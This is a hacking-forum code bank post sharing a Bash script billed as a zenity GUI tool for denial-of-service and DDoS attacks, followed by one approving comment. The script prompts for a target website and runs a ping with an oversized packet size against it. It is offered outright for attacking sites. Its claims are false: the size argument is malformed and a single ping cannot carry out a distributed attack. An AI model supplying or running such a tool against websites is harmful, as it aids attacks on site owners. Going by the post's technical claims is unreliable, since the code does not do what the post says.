Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

"DDoDeStr0yEr" Zenity GUI Denial of Service Tool - Bash Code Bank


"DDoDeStr0yEr" Zenity GUI Denial of Service Tool
Use this for Distributed Denial of Service or Denial of Service attacks.
                #Author: PoisonAcid
#!/bin/bash 
get_info ()
{
  zenity --entry --text "Input website to DDoDeStr0y..."        #  Pops up query window . . .
                    #+ and prints user entry to stdout.

                       #  Also try the --calendar and --scale options.
}

answer=$( get_info )   #  Capture stdout in $answer variable.

ping -s 65,536 "$answer"


            
Comments
Tek-E's avatar
Tek-E 12 years ago

Good Idea. The get_info function isn't really necessary for storing the output from zenity into a variable. But I like the user friendly touch:happy: